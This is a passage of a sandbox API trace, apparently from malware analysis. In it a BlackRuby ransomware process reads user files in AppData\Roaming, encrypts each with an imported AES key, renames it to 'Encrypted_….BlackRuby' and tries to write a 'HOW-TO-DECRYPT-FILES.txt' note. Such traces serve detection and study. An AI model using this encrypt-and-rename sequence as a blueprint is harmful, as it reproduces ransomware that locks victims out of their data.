lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", lpFilePart=0x0) returned 0x38 [0050.333] GetLastError () returned 0x5 [0050.334] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", lpFilePart=0x0) returned 0x38 [0050.334] GetLastError () returned 0x5 [0050.334] SetErrorMode (uMode=0x1) returned 0x0 [0050.334] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2bsfgg4l_ynrdn7so2b.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.334] GetLastError () returned 0x0 [0050.334] GetFileType (hFile=0x184) returned 0x1 [0050.334] SetErrorMode (uMode=0x0) returned 0x1 [0050.334] GetFileType (hFile=0x184) returned 0x1 [0050.334] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x18ef9 [0050.334] GetLastError () returned 0x0 [0050.334] ReadFile (in: hFile=0x184, lpBuffer=0x2c64de0, nNumberOfBytesToRead=0x18ef9, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2c64de0*, lpNumberOfBytesRead=0x18ed18*=0x18ef9, lpOverlapped=0x0) returned 1 [0050.335] GetLastError () returned 0x0 [0050.336] CloseHandle (hObject=0x184) returned 1 [0050.336] GetLastError () returned 0x0 [0050.337] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", lpFilePart=0x0) returned 0x38 [0050.337] GetLastError () returned 0x0 [0050.337] SetErrorMode (uMode=0x1) returned 0x0 [0050.337] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2bsfgg4l_ynrdn7so2b.ods"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb34b64e0, ftCreationTime.dwHighDateTime=0x1d3528f, ftLastAccessTime.dwLowDateTime=0xfa0382c0, ftLastAccessTime.dwHighDateTime=0x1d3544f, ftLastWriteTime.dwLowDateTime=0xfa0382c0, ftLastWriteTime.dwHighDateTime=0x1d3544f, nFileSizeHigh=0x0, nFileSizeLow=0x18ef9)) returned 1 [0050.337] GetLastError () returned 0x0 [0050.337] SetErrorMode (uMode=0x0) returned 0x1 [0050.337] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0050.337] GetLastError () returned 0x0 [0050.373] CryptImportKey (in: hProv=0x37c708, pbData=0x1c80f58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ce0) returned 1 [0050.373] GetLastError () returned 0x0 [0050.373] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.373] GetLastError () returned 0x0 [0050.378] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.378] GetLastError () returned 0x0 [0050.378] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360b60) returned 1 [0050.378] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.378] GetLastError () returned 0x0 [0050.378] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1cadfa4*=0x1, dwFlags=0x0) returned 1 [0050.378] GetLastError () returned 0x0 [0050.378] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1cadf70, dwFlags=0x0) returned 1 [0050.378] GetLastError () returned 0x0 [0050.379] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c96d10*, pdwDataLen=0x18ed08*=0x18ff0, dwBufLen=0x18ff0 | out: pbData=0x2c96d10*, pdwDataLen=0x18ed08*=0x18ff0) returned 1 [0050.380] GetLastError () returned 0x0 [0050.381] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cae000*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1cae000*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.381] GetLastError () returned 0x0 [0050.381] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cae030*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1cae030*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.381] GetLastError () returned 0x0 [0050.384] CryptDestroyKey (hKey=0x360ce0) returned 1 [0050.384] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.384] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.384] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", lpFilePart=0x0) returned 0x38 [0050.384] GetLastError () returned 0x0 [0050.384] SetErrorMode (uMode=0x1) returned 0x0 [0050.384] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2bsfgg4l_ynrdn7so2b.ods"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.385] GetLastError () returned 0xb7 [0050.385] GetFileType (hFile=0x184) returned 0x1 [0050.385] SetErrorMode (uMode=0x0) returned 0x1 [0050.385] GetFileType (hFile=0x184) returned 0x1 [0050.388] CloseHandle (hObject=0x184) returned 1 [0050.388] GetLastError () returned 0xb7 [0050.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods", lpFilePart=0x0) returned 0x38 [0050.388] GetLastError () returned 0xb7 [0050.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_ILD7ZaJbbs4m2NEuvp9SlWiRf9X9VZeUuUAp8wunjJ.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_ILD7ZaJbbs4m2NEuvp9SlWiRf9X9VZeUuUAp8wunjJ.BlackRuby", lpFilePart=0x0) returned 0x5f [0050.388] GetLastError () returned 0xb7 [0050.388] SetErrorMode (uMode=0x1) returned 0x0 [0050.388] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2bsfgg4l_ynrdn7so2b.ods"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb34b64e0, ftCreationTime.dwHighDateTime=0x1d3528f, ftLastAccessTime.dwLowDateTime=0xfa0382c0, ftLastAccessTime.dwHighDateTime=0x1d3544f, ftLastWriteTime.dwLowDateTime=0x263bcaa0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x19000)) returned 1 [0050.388] GetLastError () returned 0xb7 [0050.388] SetErrorMode (uMode=0x0) returned 0x1 [0050.388] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2BsFGG4l_YnrDn7sO2b.ods" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2bsfgg4l_ynrdn7so2b.ods"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_ILD7ZaJbbs4m2NEuvp9SlWiRf9X9VZeUuUAp8wunjJ.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_ild7zajbbs4m2neuvp9slwirf9x9vzeuuuap8wunjj.blackruby")) returned 1 [0050.389] GetLastError () returned 0xb7 [0050.389] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.389] GetLastError () returned 0xb7 [0050.389] SetErrorMode (uMode=0x1) returned 0x0 [0050.389] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.389] GetLastError () returned 0x5 [0050.390] SetErrorMode (uMode=0x0) returned 0x1 [0050.390] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", lpFilePart=0x0) returned 0x31 [0050.390] GetLastError () returned 0x5 [0050.390] SetErrorMode (uMode=0x1) returned 0x0 [0050.390] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2i5bpzlyaelx.gif"), fInfoLevelId=0x0, lpFileInformation=0x1ccb344 | out: lpFileInformation=0x1ccb344*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1ca22c0, ftCreationTime.dwHighDateTime=0x1d34cc7, ftLastAccessTime.dwLowDateTime=0xa4f8b680, ftLastAccessTime.dwHighDateTime=0x1d35628, ftLastWriteTime.dwLowDateTime=0xa4f8b680, ftLastWriteTime.dwHighDateTime=0x1d35628, nFileSizeHigh=0x0, nFileSizeLow=0x166df)) returned 1 [0050.390] GetLastError () returned 0x5 [0050.390] SetErrorMode (uMode=0x0) returned 0x1 [0050.391] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", lpFilePart=0x0) returned 0x31 [0050.391] GetLastError () returned 0x5 [0050.391] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", lpFilePart=0x0) returned 0x31 [0050.391] GetLastError () returned 0x5 [0050.391] SetErrorMode (uMode=0x1) returned 0x0 [0050.391] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2i5bpzlyaelx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.391] GetLastError () returned 0x0 [0050.391] GetFileType (hFile=0x184) returned 0x1 [0050.391] SetErrorMode (uMode=0x0) returned 0x1 [0050.391] GetFileType (hFile=0x184) returned 0x1 [0050.391] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x166df [0050.391] GetLastError () returned 0x0 [0050.391] ReadFile (in: hFile=0x184, lpBuffer=0x2d13d50, nNumberOfBytesToRead=0x166df, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2d13d50*, lpNumberOfBytesRead=0x18ed18*=0x166df, lpOverlapped=0x0) returned 1 [0050.393] GetLastError () returned 0x0 [0050.393] CloseHandle (hObject=0x184) returned 1 [0050.393] GetLastError () returned 0x0 [0050.394] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", lpFilePart=0x0) returned 0x31 [0050.394] GetLastError () returned 0x0 [0050.394] SetErrorMode (uMode=0x1) returned 0x0 [0050.394] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2i5bpzlyaelx.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1ca22c0, ftCreationTime.dwHighDateTime=0x1d34cc7, ftLastAccessTime.dwLowDateTime=0xa4f8b680, ftLastAccessTime.dwHighDateTime=0x1d35628, ftLastWriteTime.dwLowDateTime=0xa4f8b680, ftLastWriteTime.dwHighDateTime=0x1d35628, nFileSizeHigh=0x0, nFileSizeLow=0x166df)) returned 1 [0050.394] GetLastError () returned 0x0 [0050.394] SetErrorMode (uMode=0x0) returned 0x1 [0050.394] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c818) returned 1 [0050.394] GetLastError () returned 0x0 [0050.428] CryptImportKey (in: hProv=0x37c818, pbData=0x1d27110, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ea0) returned 1 [0050.428] GetLastError () returned 0x0 [0050.428] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.428] GetLastError () returned 0x0 [0050.435] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.435] GetLastError () returned 0x0 [0050.435] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360e20) returned 1 [0050.435] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.435] GetLastError () returned 0x0 [0050.435] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1b54b00*=0x1, dwFlags=0x0) returned 1 [0050.435] GetLastError () returned 0x0 [0050.435] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1b54acc, dwFlags=0x0) returned 1 [0050.435] GetLastError () returned 0x0 [0050.436] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d40c50*, pdwDataLen=0x18ed08*=0x167d0, dwBufLen=0x167d0 | out: pbData=0x2d40c50*, pdwDataLen=0x18ed08*=0x167d0) returned 1 [0050.437] GetLastError () returned 0x0 [0050.438] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b54b5c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b54b5c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.438] GetLastError () returned 0x0 [0050.438] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b54b8c*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b54b8c*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.438] GetLastError () returned 0x0 [0050.440] CryptDestroyKey (hKey=0x360ea0) returned 1 [0050.440] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.441] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.441] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", lpFilePart=0x0) returned 0x31 [0050.441] GetLastError () returned 0x0 [0050.441] SetErrorMode (uMode=0x1) returned 0x0 [0050.441] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2i5bpzlyaelx.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.442] GetLastError () returned 0xb7 [0050.442] GetFileType (hFile=0x184) returned 0x1 [0050.442] SetErrorMode (uMode=0x0) returned 0x1 [0050.442] GetFileType (hFile=0x184) returned 0x1 [0050.444] CloseHandle (hObject=0x184) returned 1 [0050.444] GetLastError () returned 0xb7 [0050.445] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif", lpFilePart=0x0) returned 0x31 [0050.445] GetLastError () returned 0xb7 [0050.445] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_6CFKeetPwVk6TGaf47KhIT93uYe7Mv2N6tCl0.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_6CFKeetPwVk6TGaf47KhIT93uYe7Mv2N6tCl0.BlackRuby", lpFilePart=0x0) returned 0x5a [0050.445] GetLastError () returned 0xb7 [0050.445] SetErrorMode (uMode=0x1) returned 0x0 [0050.445] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2i5bpzlyaelx.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe1ca22c0, ftCreationTime.dwHighDateTime=0x1d34cc7, ftLastAccessTime.dwLowDateTime=0xa4f8b680, ftLastAccessTime.dwHighDateTime=0x1d35628, ftLastWriteTime.dwLowDateTime=0x26455020, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x167e0)) returned 1 [0050.445] GetLastError () returned 0xb7 [0050.445] SetErrorMode (uMode=0x0) returned 0x1 [0050.445] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2i5bpzLYAeLX.gif" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2i5bpzlyaelx.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_6CFKeetPwVk6TGaf47KhIT93uYe7Mv2N6tCl0.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_6cfkeetpwvk6tgaf47khit93uye7mv2n6tcl0.blackruby")) returned 1 [0050.445] GetLastError () returned 0xb7 [0050.446] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.446] GetLastError () returned 0xb7 [0050.446] SetErrorMode (uMode=0x1) returned 0x0 [0050.446] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.446] GetLastError () returned 0x5 [0050.446] SetErrorMode (uMode=0x0) returned 0x1 [0050.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", lpFilePart=0x0) returned 0x39 [0050.447] GetLastError () returned 0x5 [0050.447] SetErrorMode (uMode=0x1) returned 0x0 [0050.447] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2mcrsfjey4lykwjh0e9r.avi"), fInfoLevelId=0x0, lpFileInformation=0x1b71e54 | out: lpFileInformation=0x1b71e54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6ecbf360, ftCreationTime.dwHighDateTime=0x1d357ea, ftLastAccessTime.dwLowDateTime=0x9a8aec70, ftLastAccessTime.dwHighDateTime=0x1d34ab8, ftLastWriteTime.dwLowDateTime=0x9a8aec70, ftLastWriteTime.dwHighDateTime=0x1d34ab8, nFileSizeHigh=0x0, nFileSizeLow=0x13b12)) returned 1 [0050.447] GetLastError () returned 0x5 [0050.447] SetErrorMode (uMode=0x0) returned 0x1 [0050.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", lpFilePart=0x0) returned 0x39 [0050.447] GetLastError () returned 0x5 [0050.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", lpFilePart=0x0) returned 0x39 [0050.447] GetLastError () returned 0x5 [0050.447] SetErrorMode (uMode=0x1) returned 0x0 [0050.447] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2mcrsfjey4lykwjh0e9r.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.447] GetLastError () returned 0x0 [0050.447] GetFileType (hFile=0x184) returned 0x1 [0050.447] SetErrorMode (uMode=0x0) returned 0x1 [0050.448] GetFileType (hFile=0x184) returned 0x1 [0050.448] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x13b12 [0050.448] GetLastError () returned 0x0 [0050.448] ReadFile (in: hFile=0x184, lpBuffer=0x1b73d74, nNumberOfBytesToRead=0x13b12, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1b73d74*, lpNumberOfBytesRead=0x18ed18*=0x13b12, lpOverlapped=0x0) returned 1 [0050.449] GetLastError () returned 0x0 [0050.449] CloseHandle (hObject=0x184) returned 1 [0050.449] GetLastError () returned 0x0 [0050.449] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", lpFilePart=0x0) returned 0x39 [0050.449] GetLastError () returned 0x0 [0050.449] SetErrorMode (uMode=0x1) returned 0x0 [0050.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2mcrsfjey4lykwjh0e9r.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6ecbf360, ftCreationTime.dwHighDateTime=0x1d357ea, ftLastAccessTime.dwLowDateTime=0x9a8aec70, ftLastAccessTime.dwHighDateTime=0x1d34ab8, ftLastWriteTime.dwLowDateTime=0x9a8aec70, ftLastWriteTime.dwHighDateTime=0x1d34ab8, nFileSizeHigh=0x0, nFileSizeLow=0x13b12)) returned 1 [0050.449] GetLastError () returned 0x0 [0050.449] SetErrorMode (uMode=0x0) returned 0x1 [0050.449] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c790) returned 1 [0050.449] GetLastError () returned 0x0 [0050.483] CryptImportKey (in: hProv=0x37c790, pbData=0x1bf577c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ae0) returned 1 [0050.483] GetLastError () returned 0x0 [0050.483] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.483] GetLastError () returned 0x0 [0050.488] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.488] GetLastError () returned 0x0 [0050.488] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x3609e0) returned 1 [0050.488] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.488] GetLastError () returned 0x0 [0050.489] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1c227c8*=0x1, dwFlags=0x0) returned 1 [0050.489] GetLastError () returned 0x0 [0050.489] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1c22794, dwFlags=0x0) returned 1 [0050.489] GetLastError () returned 0x0 [0050.489] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c22810*, pdwDataLen=0x18ed08*=0x13c10, dwBufLen=0x13c10 | out: pbData=0x1c22810*, pdwDataLen=0x18ed08*=0x13c10) returned 1 [0050.489] GetLastError () returned 0x0 [0050.489] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c4a05c*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c4a05c*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.489] GetLastError () returned 0x0 [0050.489] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c4a08c*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c4a08c*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.489] GetLastError () returned 0x0 [0050.490] CryptDestroyKey (hKey=0x360ae0) returned 1 [0050.490] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0050.491] CryptReleaseContext 